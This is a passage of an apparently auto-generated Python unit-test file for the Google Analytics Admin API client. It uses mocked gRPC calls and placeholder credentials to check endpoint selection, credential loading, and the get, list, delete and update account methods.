type: ignore import google.auth # TODO(busunkim): Once google-auth >= 1.25.0 is required transitively # through google-api-core: # - Delete the auth "less than" test cases # - Delete these pytest markers (Make the "greater than or equal to" tests the default). requires_google_auth_lt_1_25_0 = pytest.mark.skipif( packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"), reason="This test requires google-auth < 1.25.0", ) requires_google_auth_gte_1_25_0 = pytest.mark.skipif( packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"), reason="This test requires google-auth >= 1.25.0", ) def client_cert_source_callback(): return b"cert bytes", b"key bytes" # If default endpoint is localhost, then default mtls endpoint will be the same. # This method modifies the default endpoint so the client can produce a different # mtls endpoint for endpoint testing purposes. def modify_default_endpoint(client): return ( "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT ) def test__get_default_mtls_endpoint(): api_endpoint = "example.googleapis.com" api_mtls_endpoint = "example.mtls.googleapis.com" sandbox_endpoint = "example.sandbox.googleapis.com" sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com" non_googleapi = "api.example.com" assert AnalyticsAdminServiceClient._get_default_mtls_endpoint(None) is None assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint ) assert ( AnalyticsAdminServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi ) @pytest.mark.parametrize( "client_class", 
[AnalyticsAdminServiceClient, AnalyticsAdminServiceAsyncClient,] ) def test_analytics_admin_service_client_from_service_account_info(client_class): creds = ga_credentials.AnonymousCredentials() with mock.patch.object( service_account.Credentials, "from_service_account_info" ) as factory: factory.return_value = creds info = {"valid": True} client = client_class.from_service_account_info(info) assert client.transport._credentials == creds assert isinstance(client, client_class) assert client.transport._host == "analyticsadmin.googleapis.com:443" @pytest.mark.parametrize( "transport_class,transport_name", [ (transports.AnalyticsAdminServiceGrpcTransport, "grpc"), (transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio"), ], ) def test_analytics_admin_service_client_service_account_always_use_jwt( transport_class, transport_name ): with mock.patch.object( service_account.Credentials, "with_always_use_jwt_access", create=True ) as use_jwt: creds = service_account.Credentials(None, None, None) transport = transport_class(credentials=creds, always_use_jwt_access=True) use_jwt.assert_called_once_with(True) with mock.patch.object( service_account.Credentials, "with_always_use_jwt_access", create=True ) as use_jwt: creds = service_account.Credentials(None, None, None) transport = transport_class(credentials=creds, always_use_jwt_access=False) use_jwt.assert_not_called() @pytest.mark.parametrize( "client_class", [AnalyticsAdminServiceClient, AnalyticsAdminServiceAsyncClient,] ) def test_analytics_admin_service_client_from_service_account_file(client_class): creds = ga_credentials.AnonymousCredentials() with mock.patch.object( service_account.Credentials, "from_service_account_file" ) as factory: factory.return_value = creds client = client_class.from_service_account_file("dummy/file/path.json") assert client.transport._credentials == creds assert isinstance(client, client_class) client = client_class.from_service_account_json("dummy/file/path.json") assert 
client.transport._credentials == creds assert isinstance(client, client_class) assert client.transport._host == "analyticsadmin.googleapis.com:443" def test_analytics_admin_service_client_get_transport_class(): transport = AnalyticsAdminServiceClient.get_transport_class() available_transports = [ transports.AnalyticsAdminServiceGrpcTransport, ] assert transport in available_transports transport = AnalyticsAdminServiceClient.get_transport_class("grpc") assert transport == transports.AnalyticsAdminServiceGrpcTransport @pytest.mark.parametrize( "client_class,transport_class,transport_name", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", ), ], ) @mock.patch.object( AnalyticsAdminServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceClient), ) @mock.patch.object( AnalyticsAdminServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceAsyncClient), ) def test_analytics_admin_service_client_client_options( client_class, transport_class, transport_name ): # Check that if channel is provided we won't create a new one. with mock.patch.object(AnalyticsAdminServiceClient, "get_transport_class") as gtc: transport = transport_class(credentials=ga_credentials.AnonymousCredentials()) client = client_class(transport=transport) gtc.assert_not_called() # Check that if channel is provided via str we will create a new one. with mock.patch.object(AnalyticsAdminServiceClient, "get_transport_class") as gtc: client = client_class(transport=transport_name) gtc.assert_called() # Check the case api_endpoint is provided. 
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk") with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file=None, host="squid.clam.whelk", scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is # "never". with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}): with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is # "always". with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}): with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_MTLS_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has # unsupported value. with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}): with pytest.raises(MutualTLSChannelError): client = client_class() # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value. 
with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"} ): with pytest.raises(ValueError): client = client_class() # Check the case quota_project_id is provided options = client_options.ClientOptions(quota_project_id="octopus") with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id="octopus", client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) @pytest.mark.parametrize( "client_class,transport_class,transport_name,use_client_cert_env", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", "true", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", "true", ), ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", "false", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", "false", ), ], ) @mock.patch.object( AnalyticsAdminServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceClient), ) @mock.patch.object( AnalyticsAdminServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AnalyticsAdminServiceAsyncClient), ) @mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"}) def test_analytics_admin_service_client_mtls_env_auto( client_class, transport_class, transport_name, use_client_cert_env ): # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists. # Check the case client_cert_source is provided. Whether client cert is used depends on # GOOGLE_API_USE_CLIENT_CERTIFICATE value. 
with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env} ): options = client_options.ClientOptions( client_cert_source=client_cert_source_callback ) with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) if use_client_cert_env == "false": expected_client_cert_source = None expected_host = client.DEFAULT_ENDPOINT else: expected_client_cert_source = client_cert_source_callback expected_host = client.DEFAULT_MTLS_ENDPOINT patched.assert_called_once_with( credentials=None, credentials_file=None, host=expected_host, scopes=None, client_cert_source_for_mtls=expected_client_cert_source, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case ADC client cert is provided. Whether client cert is used depends on # GOOGLE_API_USE_CLIENT_CERTIFICATE value. with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env} ): with mock.patch.object(transport_class, "__init__") as patched: with mock.patch( "google.auth.transport.mtls.has_default_client_cert_source", return_value=True, ): with mock.patch( "google.auth.transport.mtls.default_client_cert_source", return_value=client_cert_source_callback, ): if use_client_cert_env == "false": expected_host = client.DEFAULT_ENDPOINT expected_client_cert_source = None else: expected_host = client.DEFAULT_MTLS_ENDPOINT expected_client_cert_source = client_cert_source_callback patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=expected_host, scopes=None, client_cert_source_for_mtls=expected_client_cert_source, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) # Check the case client_cert_source and ADC client cert are not provided. 
with mock.patch.dict( os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env} ): with mock.patch.object(transport_class, "__init__") as patched: with mock.patch( "google.auth.transport.mtls.has_default_client_cert_source", return_value=False, ): patched.return_value = None client = client_class() patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) @pytest.mark.parametrize( "client_class,transport_class,transport_name", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", ), ], ) def test_analytics_admin_service_client_client_options_scopes( client_class, transport_class, transport_name ): # Check the case scopes are provided. options = client_options.ClientOptions(scopes=["1", "2"],) with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file=None, host=client.DEFAULT_ENDPOINT, scopes=["1", "2"], client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) @pytest.mark.parametrize( "client_class,transport_class,transport_name", [ ( AnalyticsAdminServiceClient, transports.AnalyticsAdminServiceGrpcTransport, "grpc", ), ( AnalyticsAdminServiceAsyncClient, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, "grpc_asyncio", ), ], ) def test_analytics_admin_service_client_client_options_credentials_file( client_class, transport_class, transport_name ): # Check the case credentials file is provided. 
options = client_options.ClientOptions(credentials_file="credentials.json") with mock.patch.object(transport_class, "__init__") as patched: patched.return_value = None client = client_class(client_options=options) patched.assert_called_once_with( credentials=None, credentials_file="credentials.json", host=client.DEFAULT_ENDPOINT, scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) def test_analytics_admin_service_client_client_options_from_dict(): with mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceGrpcTransport.__init__" ) as grpc_transport: grpc_transport.return_value = None client = AnalyticsAdminServiceClient( client_options={"api_endpoint": "squid.clam.whelk"} ) grpc_transport.assert_called_once_with( credentials=None, credentials_file=None, host="squid.clam.whelk", scopes=None, client_cert_source_for_mtls=None, quota_project_id=None, client_info=transports.base.DEFAULT_CLIENT_INFO, always_use_jwt_access=True, ) def test_get_account( transport: str = "grpc", request_type=analytics_admin.GetAccountRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account( name="name_value", display_name="display_name_value", region_code="region_code_value", deleted=True, ) response = client.get_account(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAccountRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Account) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.region_code == "region_code_value" assert response.deleted is True def test_get_account_from_dict(): test_get_account(request_type=dict) def test_get_account_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: client.get_account() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAccountRequest() @pytest.mark.asyncio async def test_get_account_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetAccountRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Account( name="name_value", display_name="display_name_value", region_code="region_code_value", deleted=True, ) ) response = await client.get_account(request) # Establish that the underlying gRPC stub method was called. 
assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetAccountRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Account) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.region_code == "region_code_value" assert response.deleted is True @pytest.mark.asyncio async def test_get_account_async_from_dict(): await test_get_account_async(request_type=dict) def test_get_account_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: call.return_value = resources.Account() client.get_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_account_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object(type(client.transport.get_account), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account()) await client.get_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_account_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_account_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_account( analytics_admin.GetAccountRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_account_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_account), "__call__") as call: # Designate an appropriate return value for the call. 
call.return_value = resources.Account() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_account_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_account( analytics_admin.GetAccountRequest(), name="name_value", ) def test_list_accounts( transport: str = "grpc", request_type=analytics_admin.ListAccountsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAccountsResponse( next_page_token="next_page_token_value", ) response = client.list_accounts(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, pagers.ListAccountsPager) assert response.next_page_token == "next_page_token_value" def test_list_accounts_from_dict(): test_list_accounts(request_type=dict) def test_list_accounts_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: client.list_accounts() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountsRequest() @pytest.mark.asyncio async def test_list_accounts_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListAccountsRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAccountsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_accounts(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, pagers.ListAccountsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_accounts_async_from_dict(): await test_list_accounts_async(request_type=dict) def test_list_accounts_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) metadata = () pager = client.list_accounts(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.Account) for i in results) def test_list_accounts_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_accounts), "__call__") as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) pages = list(client.list_accounts(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_accounts_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_accounts), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) async_pager = await client.list_accounts(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.Account) for i in responses) @pytest.mark.asyncio async def test_list_accounts_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_accounts), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_accounts(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_delete_account( transport: str = "grpc", request_type=analytics_admin.DeleteAccountRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAccountRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_account_from_dict(): test_delete_account(request_type=dict) def test_delete_account_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. 
client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: client.delete_account() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAccountRequest() @pytest.mark.asyncio async def test_delete_account_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteAccountRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAccountRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_account_async_from_dict(): await test_delete_account_async(request_type=dict) def test_delete_account_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object(type(client.transport.delete_account), "__call__") as call: call.return_value = None client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_account_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_account_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_delete_account_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.delete_account(
            analytics_admin.DeleteAccountRequest(), name="name_value",
        )


@pytest.mark.asyncio
async def test_delete_account_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.delete_account), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = None

        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_account(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_delete_account_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_account(
            analytics_admin.DeleteAccountRequest(), name="name_value",
        )


def test_update_account(
    transport: str = "grpc", request_type=analytics_admin.UpdateAccountRequest
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.Account(
            name="name_value",
            display_name="display_name_value",
            region_code="region_code_value",
            deleted=True,
        )
        response = client.update_account(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateAccountRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.Account)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.region_code == "region_code_value"
    assert response.deleted is True


def test_update_account_from_dict():
    test_update_account(request_type=dict)


def test_update_account_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_account), "__call__") as call:
        client.update_account()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateAccountRequest()


@pytest.mark.asyncio
async def test_update_account_async(
    transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateAccountRequest
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
